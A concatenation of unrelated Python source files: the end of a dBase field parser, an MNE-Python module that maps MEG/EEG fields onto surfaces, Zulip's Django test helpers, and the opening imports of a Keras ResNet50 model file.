elif len(field_type) == 2:
# Hexadecimal ASCII code for field name.
# Example: parse2B() ('+' field)
field_type = chr(int(field_type, 16))
lookup[field_type] = getattr(self, name)
return lookup
def field_type_supported(self, field_type):
"""Checks if the field_type is supported by the parser
field_type should be a one-character string like 'C' and 'N'.
Returns a boolen which is True if the field type is supported.
"""
return field_type in self._lookup
def parse(self, field, data):
"""Parse field and return value"""
try:
func = self._lookup[field.type]
except KeyError:
raise ValueError('Unknown field type: {!r}'.format(field.type))
else:
return func(field, data)
def parse0(self, field, data):
"""Parse flags field and return as byte string"""
return data
def parseC(self, field, data):
"""Parse char field and return unicode string"""
return self.decode_text(data.rstrip(b'\0 '))
def parseD(self, field, data):
"""Parse date field and return datetime.date or None"""
try:
return datetime.date(int(data[:4]), int(data[4:6]), int(data[6:8]))
except ValueError:
if data.strip(b' 0') == b'':
# A record containing only spaces and/or zeros is
# a NULL value.
return None
else:
raise ValueError('invalid date {!r}'.format(data))
def parseF(self, field, data):
"""Parse float field and return float or None"""
# In some files * is used for padding.
data = data.strip().strip(b'*')
if data:
return float(data)
else:
return None
def parseI(self, field, data):
"""Parse integer or autoincrement field and return int."""
# Todo: is this 4 bytes on every platform?
return struct.unpack('<i', data)[0]
def parseL(self, field, data):
"""Parse logical field and return True, False or None"""
if data in b'TtYy':
return True
elif data in b'FfNn':
return False
elif data in b'? ':
return None
else:
# Todo: return something? (But that would be misleading!)
message = 'Illegal value for logical field: {!r}'
raise ValueError(message.format(data))
def _parse_memo_index(self, data):
if len(data) == 4:
return struct.unpack('<I', data)[0]
else:
try:
return int(data)
except ValueError:
if data.strip(b' \x00') == b'':
return 0
else:
raise ValueError(
'Memo index is not an integer: {!r}'.format(data))
def parseM(self, field, data):
"""Parse memo field (M, G, B or P)
Returns memo index (an integer), which can be used to look up
the corresponding memo in the memo file.
"""
memo = self.get_memo(self._parse_memo_index(data))
# Visual FoxPro allows binary data in memo fields.
# These should not be decoded as string.
if isinstance(memo, BinaryMemo):
return memo
else:
if memo is None:
return None
else:
return self.decode_text(memo)
def parseN(self, field, data):
"""Parse numeric field (N)
Returns int, float or None if the field is empty.
"""
# In some files * is used for padding.
data = data.strip().strip(b'*')
try:
return int(data)
except ValueError:
if not data.strip():
return None
else:
# Account for , in numeric fields
return float(data.replace(b',', b'.'))
def parseO(self, field, data):
"""Parse long field (O) and return float."""
return struct.unpack('d', data)[0]
def parseT(self, field, data):
"""Parse time field (T)
Returns datetime.datetime or None"""
# Julian day (32-bit little endian)
# Milliseconds since midnight (32-bit little endian)
#
# "The Julian day or Julian day number (JDN) is the number of days
# that have elapsed since 12 noon Greenwich Mean Time (UT or TT) on
# Monday, January 1, 4713 BC in the proleptic Julian calendar
# 1. That day is counted as Julian day zero. The Julian day system
# was intended to provide astronomers with a single system of dates
# that could be used when working with different calendars and to
# unify different historical chronologies." - wikipedia.org
# Offset from julian days (used in the file) to proleptic Gregorian
# ordinals (used by the datetime module)
offset = 1721425 # Todo: will this work?
if data.strip():
# Note: if the day number is 0, we return None
# I've seen data where the day number is 0 and
# msec is 2 or 4. I think we can safely return None for those.
# (At least I hope so.)
#
day, msec = struct.unpack('<LL', data)
if day:
dt = datetime.datetime.fromordinal(day - offset)
delta = datetime.timedelta(seconds=msec/1000)
return dt + delta
else:
return None
else:
return None
def parseY(self, field, data):
"""Parse currency field (Y) and return decimal.Decimal.
The field is encoded as a 8-byte little endian integer
with 4 digits of precision."""
value = struct.unpack('<q', data)[0]
# Currency fields are stored with 4 points of precision
return Decimal(value) / 10000
def parseB(self, field, data):
"""Binary memo field or double precision floating point number
dBase uses B to represent a memo index (10 bytes), while
Visual FoxPro uses it to store a double precision floating
point number (8 bytes).
"""
if self.dbversion in [0x30, 0x31, 0x32]:
return struct.unpack('d', data)[0]
else:
return self.get_memo(self._parse_memo_index(data))
def parseG(self, field, data):
"""OLE Object stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
def parseP(self, field, data):
"""Picture stored in memofile.
The raw data is returned as a binary string."""
return self.get_memo(self._parse_memo_index(data))
# Autoincrement field ('+')
parse2B = parseI
# Timestamp field ('@')
parse40 = parseT
# Varchar field ('V') (Visual FoxPro)
parseV = parseC
|
|
import numpy as np
from scipy import linalg
from copy import deepcopy
from ..io.constants import FIFF
from ..io.pick import pick_types, pick_info
from ..surface import get_head_surf, get_meg_helmet_surf
from ..io.proj import _has_eeg_average_ref_proj, make_projector
from ..transforms import transform_surface_to, read_trans, _find_trans
from ._make_forward import _create_coils
from ._lead_dots import (_do_self_dots, _do_surface_dots, _get_legen_table,
_get_legen_lut_fast, _get_legen_lut_accurate,
_do_cross_dots)
from ..parallel import check_n_jobs
from ..utils import logger, verbose
from ..fixes import partial
def _is_axial_coil(coil):
is_ax = coil['coil_class'] in (FIFF.FWD_COILC_MAG,
FIFF.FWD_COILC_AXIAL_GRAD,
FIFF.FWD_COILC_AXIAL_GRAD2)
return is_ax
def _ad_hoc_noise(coils, ch_type='meg'):
v = np.empty(len(coils))
if ch_type == 'meg':
axs = np.array([_is_axial_coil(coil) for coil in coils], dtype=bool)
v[axs] = 4e-28 # 20e-15 ** 2
v[np.logical_not(axs)] = 2.5e-25 # 5e-13 ** 2
else:
v.fill(1e-12) # 1e-6 ** 2
cov = dict(diag=True, data=v, eig=None, eigvec=None)
return cov
def _setup_dots(mode, coils, ch_type):
"""Setup dot products"""
my_origin = np.array([0.0, 0.0, 0.04])
int_rad = 0.06
noise = _ad_hoc_noise(coils, ch_type)
if mode == 'fast':
# Use 50 coefficients with nearest-neighbor interpolation
lut, n_fact = _get_legen_table(ch_type, False, 50)
lut_fun = partial(_get_legen_lut_fast, lut=lut)
else: # 'accurate'
# Use 100 coefficients with linear interpolation
lut, n_fact = _get_legen_table(ch_type, False, 100)
lut_fun = partial(_get_legen_lut_accurate, lut=lut)
return my_origin, int_rad, noise, lut_fun, n_fact
def _compute_mapping_matrix(fmd, info):
"""Do the hairy computations"""
logger.info('preparing the mapping matrix...')
# assemble a projector and apply it to the data
ch_names = fmd['ch_names']
projs = info.get('projs', list())
proj_op = make_projector(projs, ch_names)[0]
proj_dots = np.dot(proj_op.T, np.dot(fmd['self_dots'], proj_op))
noise_cov = fmd['noise']
# Whiten
if not noise_cov['diag']:
raise NotImplementedError # this shouldn't happen
whitener = np.diag(1.0 / np.sqrt(noise_cov['data'].ravel()))
whitened_dots = np.dot(whitener.T, np.dot(proj_dots, whitener))
# SVD is numerically better than the eigenvalue composition even if
# mat is supposed to be symmetric and positive definite
uu, sing, vv = linalg.svd(whitened_dots, full_matrices=False,
overwrite_a=True)
# Eigenvalue truncation
sumk = np.cumsum(sing)
sumk /= sumk[-1]
fmd['nest'] = np.where(sumk > (1.0 - fmd['miss']))[0][0]
logger.info('Truncate at %d missing %g' % (fmd['nest'], fmd['miss']))
sing = 1.0 / sing[:fmd['nest']]
# Put the inverse together
logger.info('Put the inverse together...')
inv = np.dot(uu[:, :fmd['nest']] * sing, vv[:fmd['nest']]).T
# Sandwich with the whitener
inv_whitened = np.dot(whitener.T, np.dot(inv, whitener))
# Take into account that the lead fields used to compute
# d->surface_dots were unprojected
inv_whitened_proj = (np.dot(inv_whitened.T, proj_op)).T
# Finally sandwich in the selection matrix
# This one picks up the correct lead field projection
mapping_mat = np.dot(fmd['surface_dots'], inv_whitened_proj)
# Optionally apply the average electrode reference to the final field map
if fmd['kind'] == 'eeg':
if _has_eeg_average_ref_proj(projs):
logger.info('The map will have average electrode reference')
mapping_mat -= np.mean(mapping_mat, axis=0)[np.newaxis, :]
return mapping_mat
def _map_meg_channels(inst, pick_from, pick_to, mode='fast'):
"""Find mapping from one set of channels to another.
Parameters
----------
inst : mne.io.Raw, mne.Epochs or mne.Evoked
The data to interpolate. Must be preloaded.
pick_from : array-like of int
The channels from which to interpolate.
pick_to : array-like of int
The channels to which to interpolate.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
Returns
-------
mapping : array
A mapping matrix of shape len(pick_to) x len(pick_from).
"""
info_from = pick_info(inst.info, pick_from, copy=True)
info_to = pick_info(inst.info, pick_to, copy=True)
# no need to apply trans because both from and to coils are in device
# coordinates
coils_from = _create_coils(info_from['chs'], FIFF.FWD_COIL_ACCURACY_NORMAL,
info_from['dev_head_t'], 'meg')
coils_to = _create_coils(info_to['chs'], FIFF.FWD_COIL_ACCURACY_NORMAL,
info_to['dev_head_t'], 'meg')
miss = 1e-4 # Smoothing criterion for MEG
#
# Step 2. Calculate the dot products
#
my_origin, int_rad, noise, lut_fun, n_fact = _setup_dots(mode, coils_from,
'meg')
logger.info('Computing dot products for %i coils...' % (len(coils_from)))
self_dots = _do_self_dots(int_rad, False, coils_from, my_origin, 'meg',
lut_fun, n_fact, n_jobs=1)
logger.info('Computing cross products for coils %i x %i coils...'
% (len(coils_from), len(coils_to)))
cross_dots = _do_cross_dots(int_rad, False, coils_from, coils_to,
my_origin, 'meg', lut_fun, n_fact).T
ch_names = [c['ch_name'] for c in info_from['chs']]
fmd = dict(kind='meg', ch_names=ch_names,
origin=my_origin, noise=noise, self_dots=self_dots,
surface_dots=cross_dots, int_rad=int_rad, miss=miss)
logger.info('Field mapping data ready')
#
# Step 3. Compute the mapping matrix
#
fmd['data'] = _compute_mapping_matrix(fmd, info_from)
return fmd['data']
def _as_meg_type_evoked(evoked, ch_type='grad', mode='fast'):
"""Compute virtual evoked using interpolated fields in mag/grad channels.
Parameters
----------
evoked : instance of mne.Evoked
The evoked object.
ch_type : str
The destination channel type. It can be 'mag' or 'grad'.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
Returns
-------
evoked : instance of mne.Evoked
The transformed evoked object containing only virtual channels.
"""
evoked = evoked.copy()
if ch_type not in ['mag', 'grad']:
raise ValueError('to_type must be "mag" or "grad", not "%s"'
% ch_type)
# pick the original and destination channels
pick_from = pick_types(evoked.info, meg=True, eeg=False,
ref_meg=False)
pick_to = pick_types(evoked.info, meg=ch_type, eeg=False,
ref_meg=False)
if len(pick_to) == 0:
raise ValueError('No channels matching the destination channel type'
' found in info. Please pass an evoked containing'
'both the original and destination channels. Only the'
' locations of the destination channels will be used'
' for interpolation.')
mapping = _map_meg_channels(evoked, pick_from, pick_to, mode='fast')
# compute evoked data by multiplying by the 'gain matrix' from
# original sensors to virtual sensors
data = np.dot(mapping, evoked.data[pick_from])
# keep only the destination channel types
evoked.pick_types(meg=ch_type, eeg=False, ref_meg=False)
evoked.data = data
# change channel names to emphasize they contain interpolated data
for ch in evoked.info['chs']:
ch['ch_name'] += '_virtual'
evoked.info['ch_names'] = [ch['ch_name'] for ch in evoked.info['chs']]
return evoked
@verbose
def _make_surface_mapping(info, surf, ch_type='meg', trans=None, mode='fast',
n_jobs=1, verbose=None):
"""Re-map M/EEG data to a surface
Parameters
----------
info : instance of io.meas_info.Info
Measurement info.
surf : dict
The surface to map the data to. The required fields are `'rr'`,
`'nn'`, and `'coord_frame'`. Must be in head coordinates.
ch_type : str
Must be either `'meg'` or `'eeg'`, determines the type of field.
trans : None | dict
If None, no transformation applied. Should be a Head<->MRI
transformation.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
n_jobs : int
Number of permutations to run in parallel (requires joblib package).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
mapping : array
A n_vertices x n_sensors array that remaps the MEG or EEG data,
as `new_data = np.dot(mapping, data)`.
"""
if not all(key in surf for key in ['rr', 'nn']):
raise KeyError('surf must have both "rr" and "nn"')
if 'coord_frame' not in surf:
raise KeyError('The surface coordinate frame must be specified '
'in surf["coord_frame"]')
if mode not in ['accurate', 'fast']:
raise ValueError('mode must be "accurate" or "fast", not "%s"' % mode)
# deal with coordinate frames here -- always go to "head" (easiest)
if surf['coord_frame'] == FIFF.FIFFV_COORD_MRI:
if trans is None or FIFF.FIFFV_COORD_MRI not in [trans['to'],
trans['from']]:
raise ValueError('trans must be a Head<->MRI transform if the '
'surface is not in head coordinates.')
surf = transform_surface_to(deepcopy(surf), 'head', trans)
n_jobs = check_n_jobs(n_jobs)
#
# Step 1. Prepare the coil definitions
# Do the dot products, assume surf in head coords
#
if ch_type not in ('meg', 'eeg'):
raise ValueError('unknown coil type "%s"' % ch_type)
if ch_type == 'meg':
picks = pick_types(info, meg=True, eeg=False, ref_meg=False)
logger.info('Prepare MEG mapping...')
else:
picks = pick_types(info, meg=False, eeg=True, ref_meg=False)
logger.info('Prepare EEG mapping...')
if len(picks) == 0:
raise RuntimeError('cannot map, no channels found')
chs = pick_info(info, picks, copy=True)['chs']
# create coil defs in head coordinates
if ch_type == 'meg':
# Put them in head coordinates
coils = _create_coils(chs, FIFF.FWD_COIL_ACCURACY_NORMAL,
info['dev_head_t'], 'meg')
type_str = 'coils'
miss = 1e-4 # Smoothing criterion for MEG
else: # EEG
coils = _create_coils(chs, coil_type='eeg')
type_str = 'electrodes'
miss = 1e-3 # Smoothing criterion for EEG
#
# Step 2. Calculate the dot products
#
my_origin, int_rad, noise, lut_fun, n_fact = _setup_dots(mode, coils,
ch_type)
logger.info('Computing dot products for %i %s...' % (len(coils), type_str))
self_dots = _do_self_dots(int_rad, False, coils, my_origin, ch_type,
lut_fun, n_fact, n_jobs)
sel = np.arange(len(surf['rr'])) # eventually we should do sub-selection
logger.info('Computing dot products for %i surface locations...'
% len(sel))
surface_dots = _do_surface_dots(int_rad, False, coils, surf, sel,
my_origin, ch_type, lut_fun, n_fact,
n_jobs)
#
# Step 4. Return the result
#
ch_names = [c['ch_name'] for c in chs]
fmd = dict(kind=ch_type, surf=surf, ch_names=ch_names, coils=coils,
origin=my_origin, noise=noise, self_dots=self_dots,
surface_dots=surface_dots, int_rad=int_rad, miss=miss)
logger.info('Field mapping data ready')
fmd['data'] = _compute_mapping_matrix(fmd, info)
# Remove some unecessary fields
del fmd['self_dots']
del fmd['surface_dots']
del fmd['int_rad']
del fmd['miss']
return fmd
def make_field_map(evoked, trans='auto', subject=None, subjects_dir=None,
ch_type=None, mode='fast', meg_surf='helmet',
n_jobs=1):
"""Compute surface maps used for field display in 3D
Parameters
----------
evoked : Evoked | Epochs | Raw
The measurement file. Need to have info attribute.
trans : str | 'auto' | None
The full path to the `*-trans.fif` file produced during
coregistration. If present or found using 'auto'
the maps will be in MRI coordinates.
If None, map for EEG data will not be available.
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None, map for EEG data will not be available.
subjects_dir : str
The path to the freesurfer subjects reconstructions.
It corresponds to Freesurfer environment variable SUBJECTS_DIR.
ch_type : None | 'eeg' | 'meg'
If None, a map for each available channel type will be returned.
Else only the specified type will be used.
mode : str
Either `'accurate'` or `'fast'`, determines the quality of the
Legendre polynomial expansion used. `'fast'` should be sufficient
for most applications.
meg_surf : str
Should be ``'helmet'`` or ``'head'`` to specify in which surface
to compute the MEG field map. The default value is ``'helmet'``
n_jobs : int
The number of jobs to run in parallel.
Returns
-------
surf_maps : list
The surface maps to be used for field plots. The list contains
separate ones for MEG and EEG (if both MEG and EEG are present).
"""
info = evoked.info
if ch_type is None:
types = [t for t in ['eeg', 'meg'] if t in evoked]
else:
if ch_type not in ['eeg', 'meg']:
raise ValueError("ch_type should be 'eeg' or 'meg' (got %s)"
% ch_type)
types = [ch_type]
if trans == 'auto':
# let's try to do this in MRI coordinates so they're easy to plot
trans = _find_trans(subject, subjects_dir)
if 'eeg' in types and trans is None:
logger.info('No trans file available. EEG data ignored.')
types.remove('eeg')
if len(types) == 0:
raise RuntimeError('No data available for mapping.')
if trans is not None:
trans = read_trans(trans)
if meg_surf not in ['helmet', 'head']:
raise ValueError('Surface to plot MEG fields must be '
'"helmet" or "head"')
surfs = []
for this_type in types:
if this_type == 'meg' and meg_surf == 'helmet':
surf = get_meg_helmet_surf(info, trans)
else:
surf = get_head_surf(subject, subjects_dir=subjects_dir)
surfs.append(surf)
surf_maps = list()
for this_type, this_surf in zip(types, surfs):
this_map = _make_surface_mapping(evoked.info, this_surf, this_type,
trans, n_jobs=n_jobs)
this_map['surf'] = this_surf # XXX : a bit weird...
surf_maps.append(this_map)
return surf_maps
|
|
from contextlib import contextmanager
from typing import (
cast, Any, Callable, Dict, Generator, Iterable, Iterator, List, Mapping,
Optional, Set, Sized, Tuple, Union, IO, Text, TypeVar
)
from django.core import signing
from django.core.urlresolvers import LocaleRegexURLResolver
from django.conf import settings
from django.test import TestCase, override_settings
from django.test.client import (
BOUNDARY, MULTIPART_CONTENT, encode_multipart,
)
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.db.utils import IntegrityError
import zerver.lib.upload
from zerver.lib.upload import S3UploadBackend, LocalUploadBackend
from zerver.lib.avatar import avatar_url
from zerver.lib.cache import get_cache_backend
from zerver.lib.initial_password import initial_password
from zerver.lib.db import TimeTrackingCursor
from zerver.lib.str_utils import force_text
from zerver.lib import cache
from zerver.tornado import event_queue
from zerver.tornado.handlers import allocate_handler_id
from zerver.worker import queue_processors
from zerver.lib.actions import (
check_send_message, create_stream_if_needed, bulk_add_subscriptions,
get_display_recipient, bulk_remove_subscriptions, get_stream_recipient,
)
from zerver.models import (
get_recipient,
get_stream,
get_user,
Client,
Message,
Realm,
Recipient,
Stream,
Subscription,
UserMessage,
UserProfile,
)
from zerver.lib.request import JsonableError
if False:
from zerver.lib.test_case import ZulipTestCase
import collections
import base64
import mock
import os
import re
import sys
import time
import ujson
import unittest
import urllib
from zerver.lib.str_utils import NonBinaryStr
from moto import mock_s3_deprecated
from contextlib import contextmanager
import fakeldap
import ldap
class MockLDAP(fakeldap.MockLDAP):
class LDAPError(ldap.LDAPError):
pass
class INVALID_CREDENTIALS(ldap.INVALID_CREDENTIALS):
pass
class NO_SUCH_OBJECT(ldap.NO_SUCH_OBJECT):
pass
class ALREADY_EXISTS(ldap.ALREADY_EXISTS):
pass
@contextmanager
def stub_event_queue_user_events(event_queue_return: Any, user_events_return: Any) -> Iterator[None]:
with mock.patch('zerver.lib.events.request_event_queue',
return_value=event_queue_return):
with mock.patch('zerver.lib.events.get_user_events',
return_value=user_events_return):
yield
@contextmanager
def simulated_queue_client(client: Callable[..., Any]) -> Iterator[None]:
real_SimpleQueueClient = queue_processors.SimpleQueueClient
queue_processors.SimpleQueueClient = client # type: ignore # https://github.com/JukkaL/mypy/issues/1152
yield
queue_processors.SimpleQueueClient = real_SimpleQueueClient # type: ignore # https://github.com/JukkaL/mypy/issues/1152
@contextmanager
def tornado_redirected_to_list(lst: List[Mapping[str, Any]]) -> Iterator[None]:
real_event_queue_process_notification = event_queue.process_notification
event_queue.process_notification = lambda notice: lst.append(notice)
# process_notification takes a single parameter called 'notice'.
# lst.append takes a single argument called 'object'.
# Some code might call process_notification using keyword arguments,
# so mypy doesn't allow assigning lst.append to process_notification
# So explicitly change parameter name to 'notice' to work around this problem
yield
event_queue.process_notification = real_event_queue_process_notification
@contextmanager
def simulated_empty_cache() -> Generator[
List[Tuple[str, Union[Text, List[Text]], Text]], None, None]:
cache_queries = [] # type: List[Tuple[str, Union[Text, List[Text]], Text]]
def my_cache_get(key: Text, cache_name: Optional[str]=None) -> Optional[Dict[Text, Any]]:
cache_queries.append(('get', key, cache_name))
return None
def my_cache_get_many(keys, cache_name=None): # nocoverage -- simulated code doesn't use this
# type: (List[Text], Optional[str]) -> Dict[Text, Any]
cache_queries.append(('getmany', keys, cache_name))
return {}
old_get = cache.cache_get
old_get_many = cache.cache_get_many
cache.cache_get = my_cache_get
cache.cache_get_many = my_cache_get_many
yield cache_queries
cache.cache_get = old_get
cache.cache_get_many = old_get_many
@contextmanager
def queries_captured(include_savepoints: Optional[bool]=False) -> Generator[
List[Dict[str, Union[str, bytes]]], None, None]:
'''
Allow a user to capture just the queries executed during
the with statement.
'''
queries = [] # type: List[Dict[str, Union[str, bytes]]]
def wrapper_execute(self: TimeTrackingCursor,
action: Callable[[NonBinaryStr, Iterable[Any]], None],
sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
cache = get_cache_backend(None)
cache.clear()
start = time.time()
try:
return action(sql, params)
finally:
stop = time.time()
duration = stop - start
if include_savepoints or ('SAVEPOINT' not in sql):
queries.append({
'sql': self.mogrify(sql, params).decode('utf-8'),
'time': "%.3f" % duration,
})
old_execute = TimeTrackingCursor.execute
old_executemany = TimeTrackingCursor.executemany
def cursor_execute(self: TimeTrackingCursor, sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
return wrapper_execute(self, super(TimeTrackingCursor, self).execute, sql, params) # type: ignore # https://github.com/JukkaL/mypy/issues/1167
TimeTrackingCursor.execute = cursor_execute # type: ignore # https://github.com/JukkaL/mypy/issues/1167
def cursor_executemany(self: TimeTrackingCursor, sql: NonBinaryStr,
params: Iterable[Any]=()) -> None:
return wrapper_execute(self, super(TimeTrackingCursor, self).executemany, sql, params) # type: ignore # https://github.com/JukkaL/mypy/issues/1167 # nocoverage -- doesn't actually get used in tests
TimeTrackingCursor.executemany = cursor_executemany # type: ignore # https://github.com/JukkaL/mypy/issues/1167
yield queries
TimeTrackingCursor.execute = old_execute # type: ignore # https://github.com/JukkaL/mypy/issues/1167
TimeTrackingCursor.executemany = old_executemany # type: ignore # https://github.com/JukkaL/mypy/issues/1167
@contextmanager
def stdout_suppressed() -> Iterator[IO[str]]:
"""Redirect stdout to /dev/null."""
with open(os.devnull, 'a') as devnull:
stdout, sys.stdout = sys.stdout, devnull
yield stdout
sys.stdout = stdout
def get_test_image_file(filename: str) -> IO[Any]:
test_avatar_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../tests/images'))
return open(os.path.join(test_avatar_dir, filename), 'rb')
def avatar_disk_path(user_profile: UserProfile, medium: bool=False) -> Text:
avatar_url_path = avatar_url(user_profile, medium)
avatar_disk_path = os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars",
avatar_url_path.split("/")[-2],
avatar_url_path.split("/")[-1].split("?")[0])
return avatar_disk_path
def make_client(name: str) -> Client:
client, _ = Client.objects.get_or_create(name=name)
return client
def find_key_by_email(address: Text) -> Optional[Text]:
from django.core.mail import outbox
key_regex = re.compile("accounts/do_confirm/([a-z0-9]{24})>")
for message in reversed(outbox):
if address in message.to:
return key_regex.search(message.body).groups()[0]
return None # nocoverage -- in theory a test might want this case, but none do
def message_stream_count(user_profile: UserProfile) -> int:
return UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
count()
def most_recent_usermessage(user_profile: UserProfile) -> UserMessage:
query = UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
order_by('-message')
return query[0] # Django does LIMIT here
def most_recent_message(user_profile: UserProfile) -> Message:
usermessage = most_recent_usermessage(user_profile)
return usermessage.message
def get_subscription(stream_name: Text, user_profile: UserProfile) -> Subscription:
stream = get_stream(stream_name, user_profile.realm)
recipient = get_stream_recipient(stream.id)
return Subscription.objects.get(user_profile=user_profile,
recipient=recipient, active=True)
def get_user_messages(user_profile: UserProfile) -> List[Message]:
query = UserMessage.objects. \
select_related("message"). \
filter(user_profile=user_profile). \
order_by('message')
return [um.message for um in query]
class DummyHandler:
def __init__(self) -> None:
allocate_handler_id(self) # type: ignore # this is a testing mock
class POSTRequestMock:
method = "POST"
def __init__(self, post_data: Dict[str, Any], user_profile: Optional[UserProfile]) -> None:
self.GET = {} # type: Dict[str, Any]
self.POST = post_data
self.user = user_profile
self._tornado_handler = DummyHandler()
self._log_data = {} # type: Dict[str, Any]
self.META = {'PATH_INFO': 'test'}
self.path = ''
class HostRequestMock:
"""A mock request object where get_host() works. Useful for testing
routes that use Zulip's subdomains feature"""
def __init__(self, user_profile: UserProfile=None, host: Text=settings.EXTERNAL_HOST) -> None:
self.host = host
self.GET = {} # type: Dict[str, Any]
self.POST = {} # type: Dict[str, Any]
self.META = {'PATH_INFO': 'test'}
self.path = ''
self.user = user_profile
self.method = ''
self.body = ''
self.content_type = ''
self._email = ''
def get_host(self) -> Text:
return self.host
class MockPythonResponse:
def __init__(self, text: Text, status_code: int) -> None:
self.text = text
self.status_code = status_code
@property
def ok(self) -> bool:
return self.status_code == 200
INSTRUMENTING = os.environ.get('TEST_INSTRUMENT_URL_COVERAGE', '') == 'TRUE'
INSTRUMENTED_CALLS = [] # type: List[Dict[str, Any]]
UrlFuncT = Callable[..., HttpResponse] # TODO: make more specific
def append_instrumentation_data(data: Dict[str, Any]) -> None:
INSTRUMENTED_CALLS.append(data)
def instrument_url(f: UrlFuncT) -> UrlFuncT:
if not INSTRUMENTING: # nocoverage -- option is always enabled; should we remove?
return f
else:
def wrapper(self: 'ZulipTestCase', url: Text, info: Dict[str, Any]={},
**kwargs: Any) -> HttpResponse:
start = time.time()
result = f(self, url, info, **kwargs)
delay = time.time() - start
test_name = self.id()
if '?' in url:
url, extra_info = url.split('?', 1)
else:
extra_info = ''
append_instrumentation_data(dict(
url=url,
status_code=result.status_code,
method=f.__name__,
delay=delay,
extra_info=extra_info,
info=info,
test_name=test_name,
kwargs=kwargs))
return result
return wrapper
def write_instrumentation_reports(full_suite: bool) -> None:
if INSTRUMENTING:
calls = INSTRUMENTED_CALLS
from zproject.urls import urlpatterns, v1_api_and_json_patterns
# Find our untested urls.
pattern_cnt = collections.defaultdict(int) # type: Dict[str, int]
def re_strip(r: Any) -> str:
return str(r).lstrip('^').rstrip('$')
def find_patterns(patterns: List[Any], prefixes: List[str]) -> None:
for pattern in patterns:
find_pattern(pattern, prefixes)
def cleanup_url(url: str) -> str:
if url.startswith('/'):
url = url[1:]
if url.startswith('http://testserver/'):
url = url[len('http://testserver/'):]
if url.startswith('http://zulip.testserver/'):
url = url[len('http://zulip.testserver/'):]
if url.startswith('http://testserver:9080/'):
url = url[len('http://testserver:9080/'):]
return url
def find_pattern(pattern: Any, prefixes: List[str]) -> None:
if isinstance(pattern, type(LocaleRegexURLResolver)):
return # nocoverage -- shouldn't actually happen
if hasattr(pattern, 'url_patterns'):
return
canon_pattern = prefixes[0] + re_strip(pattern.regex.pattern)
cnt = 0
for call in calls:
if 'pattern' in call:
continue
url = cleanup_url(call['url'])
for prefix in prefixes:
if url.startswith(prefix):
match_url = url[len(prefix):]
if pattern.regex.match(match_url):
if call['status_code'] in [200, 204, 301, 302]:
cnt += 1
call['pattern'] = canon_pattern
pattern_cnt[canon_pattern] += cnt
find_patterns(urlpatterns, ['', 'en/', 'de/'])
find_patterns(v1_api_and_json_patterns, ['api/v1/', 'json/'])
assert len(pattern_cnt) > 100
untested_patterns = set([p for p in pattern_cnt if pattern_cnt[p] == 0])
exempt_patterns = set([
# We exempt some patterns that are called via Tornado.
'api/v1/events',
'api/v1/register',
# We also exempt some development environment debugging
# static content URLs, since the content they point to may
# or may not exist.
'coverage/(?P<path>.*)',
'node-coverage/(?P<path>.*)',
'docs/(?P<path>.*)',
])
untested_patterns -= exempt_patterns
var_dir = 'var' # TODO make sure path is robust here
fn = os.path.join(var_dir, 'url_coverage.txt')
with open(fn, 'w') as f:
for call in calls:
try:
line = ujson.dumps(call)
f.write(line + '\n')
except OverflowError: # nocoverage -- test suite error handling
print('''
A JSON overflow error was encountered while
producing the URL coverage report. Sometimes
this indicates that a test is passing objects
into methods like client_post(), which is
unnecessary and leads to false positives.
''')
print(call)
if full_suite:
print('INFO: URL coverage report is in %s' % (fn,))
print('INFO: Try running: ./tools/create-test-api-docs')
if full_suite and len(untested_patterns): # nocoverage -- test suite error handling
print("\nERROR: Some URLs are untested! Here's the list of untested URLs:")
for untested_pattern in sorted(untested_patterns):
print(" %s" % (untested_pattern,))
sys.exit(1)
def get_all_templates() -> List[str]:
templates = []
relpath = os.path.relpath
isfile = os.path.isfile
path_exists = os.path.exists
def is_valid_template(p: Text, n: Text) -> bool:
return 'webhooks' not in p \
and not n.startswith('.') \
and not n.startswith('__init__') \
and not n.endswith('.md') \
and not n.endswith('.source.html') \
and isfile(p)
def process(template_dir: str, dirname: str, fnames: Iterable[str]) -> None:
for name in fnames:
path = os.path.join(dirname, name)
if is_valid_template(path, name):
templates.append(relpath(path, template_dir))
for engine in loader.engines.all():
template_dirs = [d for d in engine.template_dirs if path_exists(d)]
for template_dir in template_dirs:
template_dir = os.path.normpath(template_dir)
for dirpath, dirnames, fnames in os.walk(template_dir):
process(template_dir, dirpath, fnames)
return templates
def load_subdomain_token(response: HttpResponse) -> Dict[str, Any]:
assert isinstance(response, HttpResponseRedirect)
token = response.url.rsplit('/', 1)[1]
return signing.loads(token, salt='zerver.views.auth.log_into_subdomain')
FuncT = TypeVar('FuncT', bound=Callable[..., None])
def use_s3_backend(method: FuncT) -> FuncT:
@mock_s3_deprecated
@override_settings(LOCAL_UPLOADS_DIR=None)
def new_method(*args: Any, **kwargs: Any) -> Any:
zerver.lib.upload.upload_backend = S3UploadBackend()
try:
return method(*args, **kwargs)
finally:
zerver.lib.upload.upload_backend = LocalUploadBackend()
return new_method
|
|
'''
Taken from https://github.com/fchollet/deep-learning-models
ResNet50 model for Keras.
# Reference:
- [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385)
Adapted from code contributed by BigMoyan.
'''
from __future__ import print_function
import numpy as np
import warnings
from keras.layers import merge, Input
from keras.layers import Dense, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, AveragePooling2D
from keras.layers import BatchNormalization
from keras.models import Model
from keras.preprocessing import image
import keras.backend as K
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from .imagenet_utils import decode_predictions, preprocess_input
